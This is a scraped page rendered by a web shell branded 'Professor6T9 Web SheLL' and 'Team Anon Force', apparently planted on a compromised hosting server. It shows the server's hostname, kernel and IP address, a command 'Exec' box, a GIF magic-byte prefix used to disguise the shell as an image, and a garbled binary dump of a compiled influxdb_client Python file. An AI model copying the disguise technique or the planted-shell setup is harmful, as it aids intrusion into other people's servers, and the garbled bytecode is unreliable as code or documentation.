GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux das102.truehost.cloud 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64
LiteSpeed
156.232.88.2
/
opt
/
alt
/
python38
/
lib
/
python3.8
/
site-packages
/
influxdb_client
/
domain
/
__pycache__
[ HOME ]
Exec
Submit
File Name : replication_creation_request.cpython-38.pyc
U ܒi�, � @ s( d Z ddlZddlZG dd� de�ZdS )a InfluxDB OSS API Service. The InfluxDB v2 API provides a programmatic interface for all interactions with InfluxDB. Access the InfluxDB API using the `/api/v2/` endpoint. # noqa: E501 OpenAPI spec version: 2.0.0 Generated by: https://openapi-generator.tech � Nc @ sz e Zd ZdZddddddddddd� Zdddd d ddd ddd� Zd>dd�Zedd� �Zej dd� �Zedd� �Z e j dd� �Z edd� �Zej dd� �Zedd � �Zej d!d � �Zed"d#� �Z e j d$d#� �Z ed%d&� �Zej d'd&� �Zed(d)� �Zej d*d)� �Zed+d,� �Zej d-d,� �Zed.d/� �Zej d0d/� �Zed1d2� �Zej d3d2� �Zd4d5� Zd6d7� Zd8d9� Zd:d;� Zd<d=� ZdS )?�ReplicationCreationRequestz�NOTE: This class is auto generated by OpenAPI Generator. Ref: https://openapi-generator.tech Do not edit the class manually. �str�int�bool) �name�description�org_id� remote_id�local_bucket_id�remote_bucket_id�remote_bucket_name�max_queue_size_bytes�drop_non_retryable_data�max_age_secondsr r ZorgIDZremoteIDZ localBucketIDZremoteBucketIDZremoteBucketNameZmaxQueueSizeBytesZdropNonRetryableDataZ maxAgeSecondsN��F�: c C s� d| _ d| _d| _d| _d| _d| _d| _d| _d| _d| _ d| _ || _|dk rV|| _|| _ || _|| _|dk rv|| _|dk r�|| _|| _| dk r�| | _| | _dS )z8ReplicationCreationRequest - a model defined in OpenAPI.N)�_name�_description�_org_id� _remote_id�_local_bucket_id�_remote_bucket_id�_remote_bucket_name�_max_queue_size_bytes�_drop_non_retryable_data�_max_age_secondsZ discriminatorr r r r r r r r r r )�selfr r r r r r r r r r � r �d/opt/alt/python38/lib/python3.8/site-packages/influxdb_client/domain/replication_creation_request.py�__init__: s2 z#ReplicationCreationRequest.__init__c C s | j S )z�Get the name of this ReplicationCreationRequest. :return: The name of this ReplicationCreationRequest. :rtype: str )r �r r r r r W s zReplicationCreationRequest.namec C s |dkrt d��|| _dS )z�Set the name of this ReplicationCreationRequest. :param name: The name of this ReplicationCreationRequest. :type: str Nz,Invalid value for `name`, must not be `None`)� ValueErrorr )r r r r r r ` s c C s | j S )z�Get the description of this ReplicationCreationRequest. :return: The description of this ReplicationCreationRequest. :rtype: str �r r r r r r k s z&ReplicationCreationRequest.descriptionc C s || _ dS )z�Set the description of this ReplicationCreationRequest. :param description: The description of this ReplicationCreationRequest. :type: str Nr"